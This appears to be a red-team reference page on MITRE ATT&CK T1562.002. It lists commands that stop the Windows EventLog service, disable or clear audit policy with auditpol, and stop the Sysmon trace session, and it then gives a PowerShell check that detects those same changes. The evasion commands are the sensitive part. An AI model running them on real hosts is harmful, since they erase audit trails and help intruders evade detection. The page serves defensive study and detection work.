Disable Windows Event Logging

MITRE ATT&CK, Defense Evasion, Sub-technique T1562.002

Disabling Windows event logging allows an attacker to operate on a compromised host while leaving minimal evidence behind.

Methods

# Stop the EventLog service with PowerShell (Stop-Service halts it; it does not change the start type):
Stop-Service -Name EventLog

# Disable auditing for the Account Logon category:
auditpol /set /category:"Account Logon" /success:disable /failure:disable

# Clear the audit policy
auditpol /clear /y
auditpol /remove /allusers

# Disable Sysmon
## https://twitter.com/_batsec_/status/1327386867365457920?s=20&t=rMzsQI6ENH2SYVVaTYTqAA
logman stop EventLog-Microsoft-Windows-Sysmon-Operational -ets
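A defender-side check for the same conditions, added here as an example and not part of the original page: it reports whether the EventLog service, the "Account Logon" audit category and the Sysmon trace session are in their expected state, then pulls the Security events that record such changes. It assumes the default Sysmon session name used above and an elevated prompt.

```powershell
# Added example (not from the original page): health check for the logging
# components that the methods above alter. Run from an elevated PowerShell.
# Assumption: Sysmon uses its default trace session name; adjust if renamed.

$findings = @()

# 1. The EventLog service should be Running and set to start automatically.
$svc = Get-Service -Name EventLog
if ($svc.Status -ne 'Running' -or $svc.StartType -ne 'Automatic') {
    $findings += "EventLog service is $($svc.Status), start type $($svc.StartType)"
}

# 2. Every subcategory under "Account Logon" should still be audited.
#    auditpol /r emits CSV with an "Inclusion Setting" column.
$policy = auditpol /get /category:"Account Logon" /r |
    Where-Object { $_ } | ConvertFrom-Csv
foreach ($row in $policy) {
    if ($row.'Inclusion Setting' -eq 'No Auditing') {
        $findings += "Audit subcategory '$($row.Subcategory)' is set to No Auditing"
    }
}

# 3. The Sysmon ETW session should exist; logman returns non-zero if it does not.
$session = 'EventLog-Microsoft-Windows-Sysmon-Operational'
$null = logman query $session -ets 2>&1
if ($LASTEXITCODE -ne 0) {
    $findings += "Sysmon trace session '$session' is not running"
}

# 4. The Security log itself records tampering: 1100 (event logging service
#    shut down) and 4719 (system audit policy changed). If the EventLog
#    service is stopped this query fails, which finding 1 already reports.
$events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 1100, 4719 } `
    -MaxEvents 20 -ErrorAction SilentlyContinue
foreach ($e in $events) {
    $firstLine = ($e.Message -split "`n")[0]
    $findings += "$($e.TimeCreated) Security event $($e.Id): $firstLine"
}

if ($findings.Count -eq 0) { 'No logging tampering indicators found' } else { $findings }
```

Each finding maps back to one method in the list above, so an empty result means none of those changes is currently in effect on the host.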

Tools

References